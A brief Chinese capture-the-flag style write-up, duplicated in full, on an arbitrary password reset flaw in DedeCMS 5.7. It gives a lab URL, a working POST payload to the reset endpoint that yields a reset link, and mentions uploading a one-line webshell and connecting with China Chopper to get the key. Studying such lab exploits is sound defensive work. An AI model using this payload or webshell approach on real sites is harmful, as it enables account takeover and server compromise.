dede 5.7 任意用户重置密码前台

返回了重置的链接,还要把&删除了,就可以重置密码了

结果只能改test的密码,进去过后,这个居然是admin的密码,有点头大,感觉这样就没有意思了

我是直接上传的一句话,用菜刀连才有乐趣

OK了交key
url:http://219.153.49.228:44939/member/resetpassword.php
post payload:dopost=safequestion&gourl=&id=2&safequestion=0.0

返回了重置的链接,还要把&删除了,就可以重置密码了

结果只能改test的密码,进去过后,这个居然是admin的密码,有点头大,感觉这样就没有意思了

我是直接上传的一句话,用菜刀连才有乐趣

OK了交key
url:http://219.153.49.228:44939/member/resetpassword.php
post payload:dopost=safequestion&gourl=&id=2&safequestion=0.0